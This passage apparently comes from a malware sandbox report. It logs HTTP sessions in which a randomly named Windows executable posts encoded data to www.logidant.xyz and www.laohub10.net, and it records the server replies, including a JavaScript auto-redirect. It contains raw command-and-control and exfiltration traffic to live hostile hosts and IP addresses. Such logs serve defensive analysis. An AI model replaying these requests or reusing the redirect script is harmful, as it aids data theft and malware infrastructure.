18	192.168.2.8	65523	45.141.156.114	80	3036	C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:50:34.888376951 CET	649	OUT	POST /iuvu/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 224 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.logidant.xyz Origin: http://www.logidant.xyz Referer: http://www.logidant.xyz/iuvu/ User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Data Raw: 32 6e 49 3d 31 45 36 43 37 35 54 5a 70 4a 4e 45 53 62 43 78 4c 74 68 72 42 48 54 63 4e 57 46 41 65 32 76 66 47 2f 59 4c 7a 7a 36 37 4f 54 35 56 47 46 6f 58 30 53 72 68 41 5a 45 49 4b 4d 66 72 55 55 2b 39 52 67 54 66 61 6d 36 39 68 38 74 75 30 6f 68 34 76 62 79 4b 58 46 62 2f 33 31 53 55 77 59 48 41 6e 35 77 6a 62 36 34 41 42 4a 37 59 2b 2b 41 4d 53 54 35 59 6b 51 35 35 42 2b 47 7a 2f 45 79 33 32 69 75 52 62 33 62 54 42 48 5a 6c 57 4f 35 65 74 34 71 35 62 73 34 76 77 70 56 64 37 61 50 31 75 7a 2f 71 58 67 7a 75 63 43 63 4b 59 43 52 43 70 55 6c 72 75 32 62 64 35 52 52 42 7a 6e 47 56 2b 6f 57 78 4c 51 51 4b 54 34 4a 74 48 38 54 57 49 54 7a 41 6b 36 4b 61 50 59 46 55 Data Ascii: 2nI=1E6C75TZpJNESbCxLthrBHTcNWFAe2vfG/YLzz67OT5VGFoX0SrhAZEIKMfrUU+9RgTfam69h8tu0oh4vbyKXFb/31SUwYHAn5wjb64ABJ7Y++AMST5YkQ55B+Gz/Ey32iuRb3bTBHZlWO5et4q5bs4vwpVd7aP1uz/qXgzucCcKYCRCpUlru2bd5RRBznGV+oWxLQQKT4JtH8TWITzAk6KaPYFU
Jan 10, 2025 22:50:35.564785957 CET	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 10 Jan 2025 21:50:35 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.8	65524	45.141.156.114	80	3036	C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:50:37.437347889 CET	1666	OUT	POST /iuvu/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 1240 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.logidant.xyz Origin: http://www.logidant.xyz Referer: http://www.logidant.xyz/iuvu/ User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Data Raw: 32 6e 49 3d 31 45 36 43 37 35 54 5a 70 4a 4e 45 53 62 43 78 4c 74 68 72 42 48 54 63 4e 57 46 41 65 32 76 66 47 2f 59 4c 7a 7a 36 37 4f 53 42 56 47 32 77 58 30 7a 72 68 42 5a 45 49 55 63 66 71 55 55 2f 2f 52 67 4c 62 61 6d 6d 44 68 2b 6c 75 79 4b 70 34 6e 4b 79 4b 65 46 62 2f 6f 6c 53 52 2b 34 48 5a 6e 39 63 6e 62 36 6f 41 42 4a 37 59 2b 34 6b 4d 47 77 68 59 69 51 35 34 47 2b 48 79 37 45 79 66 32 69 32 42 62 78 48 44 42 58 35 6c 58 74 42 65 76 4c 53 35 48 38 35 4a 67 35 56 46 37 61 4b 79 75 7a 69 52 58 67 32 37 63 45 73 4b 59 44 30 42 35 41 31 7a 77 48 4c 7a 38 44 35 52 79 31 69 61 38 4a 71 45 4e 6a 41 51 51 59 74 2b 48 63 66 34 4d 6c 43 38 6d 2b 4f 7a 4c 74 6f 46 5a 69 32 46 55 30 45 36 30 43 6c 39 54 6c 54 4d 35 4b 2b 2b 56 50 78 65 61 6a 39 53 34 6b 54 4b 69 6e 6b 4b 6a 50 6e 6e 6f 4f 53 2f 6e 30 53 52 4b 37 62 61 30 43 62 69 58 41 64 34 61 34 76 71 31 47 4e 67 74 49 32 73 5a 69 38 74 6c 39 50 2b 30 77 33 4f 76 70 4b 78 6d 63 69 6b 42 31 7a 76 32 2f 74 54 31 38 6e 66 41 61 4a 49 6b 4a 51 6f 30 78 [TRUNCATED] Data Ascii: 2nI=1E6C75TZpJNESbCxLthrBHTcNWFAe2vfG/YLzz67OSBVG2wX0zrhBZEIUcfqUU//RgLbammDh+luyKp4nKyKeFb/olSR+4HZn9cnb6oABJ7Y+4kMGwhYiQ54G+Hy7Eyf2i2BbxHDBX5lXtBevLS5H85Jg5VF7aKyuziRXg27cEsKYD0B5A1zwHLz8D5Ry1ia8JqENjAQQYt+Hcf4MlC8m+OzLtoFZi2FU0E60Cl9TlTM5K++VPxeaj9S4kTKinkKjPnnoOS/n0SRK7ba0CbiXAd4a4vq1GNgtI2sZi8tl9P+0w3OvpKxmcikB1zv2/tT18nfAaJIkJQo0xywPUAF2J+bw3aSn8/suMT4v+H7JbiywjYUN8COYgT2FbUMC+/uCwYPynE7p34GXEa9Uuz0PPxrzuUCaIO5wCKz9DA85F36xdyBTBPZobdnwEcuI6EQz+8hoso2aE+hhG0/Cy2rdoEQ+nO9gSWJLGfXkBQO7mGLiFhu3c8dJrEGhFVfv5OxDunHUU44VS90k6IQgNx0FHPY3QjLvKwk41Smvik3dgqBplEFn4+v6TzVZY51rh+WG7Zaj13/fz/1hKc8BPx7JP6hB/dyAZE/st/O3Q3+i079qggMDI6xvNtcnNv+pqATyq34qZ/OIQZ0AP7I+lfXRJAyEjKpXdZEXaIHc/40nAEvXJTzsgJbjik84t0GZhbNW9KP/4iqvFyENloxFT0t4zRrJwJ9NdgTidGbxXSxTeZNJRtq69Dm/whPxj5dWl6ezFCqNtZQQO1CpUwO1xnO7uXjIf9zWsUbIXOeFxEk8krUYTSczrEup5iQFtCzROQNmmbZoUIVfJjO3uf4NE+wIpzeeo5Oi7DMq0NgMsntPKBRvmT4VsRTjfhTV6Lx/pkuhdL42+RbtyymRwEECFMIg/p/Bfw697olKjjy6Wwq4Me+dmtF4UTXE8SDr2KiBLd09yebBHDNUbCmsSPMgze6/QypIflmi1rwLCsCvO2OLWBFMTSe [TRUNCATED]
Jan 10, 2025 22:50:38.110814095 CET	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 10 Jan 2025 21:50:38 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.8	65525	45.141.156.114	80	3036	C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:50:39.975893021 CET	370	OUT	GET /iuvu/?2nI=4GSi4NjhieA+eby0NKQzTEPCPA5td1TZNopVgGr+MixqN2kv+x7vZ9YkKN38Qwr7I1LnRiqAhNhB07BIn5yne0LzqH+H8Nzlr/8TCrRqA4T6hsg8YSRhr2x7F+rJ6nzbiw==&knE=vl8DPVdxl HTTP/1.1 Accept: / Accept-Language: en-US Connection: close Host: www.logidant.xyz User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Jan 10, 2025 22:50:40.676239967 CET	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 10 Jan 2025 21:50:40 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.8	65526	202.79.161.151	80	3036	C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:50:46.295875072 CET	629	OUT	POST /36be/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 204 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.laohub10.net Origin: http://www.laohub10.net Referer: http://www.laohub10.net/36be/ User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Data Raw: 32 6e 49 3d 2b 52 57 2f 42 36 57 30 66 4b 6d 61 64 49 78 36 6f 50 76 73 4d 2b 30 43 6c 59 47 50 47 50 54 78 32 4e 6d 46 75 69 6b 75 41 56 71 4b 63 2b 4a 33 31 7a 49 4c 77 35 31 64 6c 64 42 35 73 4d 36 31 47 50 32 4b 38 72 6f 73 38 45 2b 71 2f 69 79 4a 42 66 34 39 33 41 56 45 70 2f 6a 4c 59 53 79 33 36 4f 7a 30 69 61 62 50 4e 5a 46 36 58 2f 77 46 4d 61 53 6f 58 48 33 54 67 32 66 70 6f 78 71 65 71 53 59 47 35 32 4b 39 74 32 2b 78 43 63 48 68 76 67 2b 4c 4e 73 6d 75 46 47 71 43 49 69 6f 54 4f 58 73 31 70 71 51 52 6d 4d 61 70 2b 75 73 45 31 64 4b 70 62 4b 31 79 61 43 77 74 5a 47 30 7a 36 75 61 44 70 78 55 3d Data Ascii: 2nI=+RW/B6W0fKmadIx6oPvsM+0ClYGPGPTx2NmFuikuAVqKc+J31zILw51dldB5sM61GP2K8ros8E+q/iyJBf493AVEp/jLYSy36Oz0iabPNZF6X/wFMaSoXH3Tg2fpoxqeqSYG52K9t2+xCcHhvg+LNsmuFGqCIioTOXs1pqQRmMap+usE1dKpbK1yaCwtZG0z6uaDpxU=
Jan 10, 2025 22:50:47.106045961 CET	533	IN	HTTP/1.1 200 OK Server: Apache Content-Type: text/html; charset=utf-8 Accept-Ranges: bytes Cache-Control: max-age=86400 Age: 1 Connection: Close Content-Length: 358 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 77 6e 2d 73 7a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 [TRUNCATED] Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://down-sz.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.8	65527	202.79.161.151	80	3036	C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:50:48.846307039 CET	649	OUT	POST /36be/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 224 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.laohub10.net Origin: http://www.laohub10.net Referer: http://www.laohub10.net/36be/ User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Data Raw: 32 6e 49 3d 2b 52 57 2f 42 36 57 30 66 4b 6d 61 62 6f 68 36 6b 4a 6e 73 5a 4f 30 44 35 6f 47 50 4a 76 53 32 32 4e 36 46 75 6d 56 6c 42 6e 2b 4b 62 66 35 33 32 78 77 4c 39 5a 31 64 71 39 42 38 69 73 37 33 47 50 79 73 38 75 41 73 38 41 65 71 2f 6e 4f 4a 42 4f 34 2b 30 77 56 47 77 76 6a 4a 63 53 79 33 36 4f 7a 30 69 65 4c 70 4e 64 70 36 55 4f 41 46 4e 37 53 6e 5a 6e 33 55 33 47 66 70 6a 52 71 61 71 53 59 77 35 7a 53 62 74 77 36 78 43 65 66 68 76 31 65 4d 61 38 6d 30 4c 6d 72 67 43 48 59 57 4c 32 34 77 74 49 4d 75 70 39 71 53 2f 59 64 75 76 2f 43 76 59 4b 64 5a 61 42 59 62 63 78 70 62 67 4e 4b 7a 33 6d 41 78 45 6c 79 34 69 6e 69 49 45 41 36 34 43 7a 76 48 57 47 33 6b Data Ascii: 2nI=+RW/B6W0fKmaboh6kJnsZO0D5oGPJvS22N6FumVlBn+Kbf532xwL9Z1dq9B8is73GPys8uAs8Aeq/nOJBO4+0wVGwvjJcSy36Oz0ieLpNdp6UOAFN7SnZn3U3GfpjRqaqSYw5zSbtw6xCefhv1eMa8m0LmrgCHYWL24wtIMup9qS/Yduv/CvYKdZaBYbcxpbgNKz3mAxEly4iniIEA64CzvHWG3k
Jan 10, 2025 22:50:49.671652079 CET	533	IN	HTTP/1.1 200 OK Server: Apache Content-Type: text/html; charset=utf-8 Accept-Ranges: bytes Cache-Control: max-age=86400 Age: 1 Connection: Close Content-Length: 358 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 77 6e 2d 73 7a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 [TRUNCATED] Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://down-sz.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.8	65528	202.79.161.151	80	3036	C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:50:51.398108006 CET	1666	OUT	POST /36be/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 1240 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.laohub10.net Origin: http://www.laohub10.net Referer: http://www.laohub10.net/36be/ User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Data Raw: 32 6e 49 3d 2b 52 57 2f 42 36 57 30 66 4b 6d 61 62 6f 68 36 6b 4a 6e 73 5a 4f 30 44 35 6f 47 50 4a 76 53 32 32 4e 36 46 75 6d 56 6c 42 6e 47 4b 62 6f 52 33 31 57 63 4c 38 5a 31 64 6a 64 42 39 69 73 37 32 47 50 4b 6f 38 75 46 62 38 43 6d 71 2b 46 32 4a 51 4d 41 2b 76 67 56 47 74 2f 6a 55 59 53 79 59 36 4f 6a 34 69 61 58 70 4e 64 70 36 55 4e 6f 46 4e 71 53 6e 4a 58 33 54 67 32 66 74 6f 78 71 79 71 53 41 67 35 79 6e 6d 74 6a 79 78 44 2b 50 68 6a 68 2b 4d 46 4d 6d 71 47 47 72 47 43 48 64 47 4c 32 55 57 74 4a 34 45 70 36 47 53 2b 63 38 33 71 74 44 30 62 73 52 59 63 67 59 39 63 32 49 2f 72 73 36 49 36 68 6f 49 43 43 47 30 30 48 47 61 4a 67 7a 73 59 6b 75 57 65 79 57 45 64 43 45 6f 2b 36 58 30 34 42 33 39 6e 75 4e 56 39 33 41 58 76 41 33 55 33 51 43 43 53 74 78 42 59 36 4b 54 56 4b 4d 35 38 31 7a 4c 68 73 38 46 34 42 30 77 73 53 69 66 4d 76 71 6b 67 43 61 67 75 4f 69 68 77 77 42 54 53 48 66 30 4b 35 4a 71 77 61 76 5a 70 59 68 4b 63 6d 79 54 7a 4b 54 57 78 33 4d 51 54 48 6e 4e 6a 49 32 54 42 67 2b 6d 6b 39 [TRUNCATED] Data Ascii: 2nI=+RW/B6W0fKmaboh6kJnsZO0D5oGPJvS22N6FumVlBnGKboR31WcL8Z1djdB9is72GPKo8uFb8Cmq+F2JQMA+vgVGt/jUYSyY6Oj4iaXpNdp6UNoFNqSnJX3Tg2ftoxqyqSAg5ynmtjyxD+Phjh+MFMmqGGrGCHdGL2UWtJ4Ep6GS+c83qtD0bsRYcgY9c2I/rs6I6hoICCG00HGaJgzsYkuWeyWEdCEo+6X04B39nuNV93AXvA3U3QCCStxBY6KTVKM581zLhs8F4B0wsSifMvqkgCaguOihwwBTSHf0K5JqwavZpYhKcmyTzKTWx3MQTHnNjI2TBg+mk9lg3IAryk6EFMubuvJYay1Ag3fLMuABsYQ4hl8lNQGF7TvjZvkr96kvqSc/h5e1TrjZQwd4FcrA1aLAHMa0fa4nmFfEaDpFariHc6epeSKR+MSWgM8pWyaQN9rRFcaZ0L0/t+8NacAL7h7PIC7mVpKI1zIWgnKZft0qRTbO/fSzB5GVM0U5oRxM5ZLE75Z7k+W+P+tCsQHuxjMkR4CJPT9r8dUYKGDfoGOCsT/3Mbjsns1sunQBWhXkCwATR+O47IdVxutjFpDMMH3fEp80Tb6kN6IpmQmuWDkTknVkZZJkFCP1v3vtfDDZFfUhBQONCMnJF0VD0lmuj4gSGV4xVj/jo9KmxTO5z+f46BEi+sKgsMXyyadvPmeziY87y+yy8NXhbmiGJUIgclyMPSOBeUqxRD2+jDujfBgcBYOSwXSz5lCh+UCcW/tLAdcwAVrrwBlQWTYuq3j0n8WsfPrC1DUGxmzz6dpz9gC7Nd2lUpx7Iqf+9U249C7HOxVqCDBvLYkGyGp1nq3SY4+2CCvkluxf+6fPTQR/dEoT7k95RFYuZ2dOqBMca6oZGUzDvlVSrGgh5VGHv8dtVWX/1fhtiLijWvW2j6b5ModvayGeLxE8YrJorSKDgj+Y1V0XxR4ck8VTd2YoFWpDtEkdwIGC7loptEPSosRKwiAi [TRUNCATED]
Jan 10, 2025 22:50:52.194669962 CET	533	IN	HTTP/1.1 200 OK Server: Apache Content-Type: text/html; charset=utf-8 Accept-Ranges: bytes Cache-Control: max-age=86400 Age: 1 Connection: Close Content-Length: 358 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 77 6e 2d 73 7a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 [TRUNCATED] Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://down-sz.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.8	65529	202.79.161.151	80	3036	C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe

Timestamp	Bytes transferred	Direction	Data
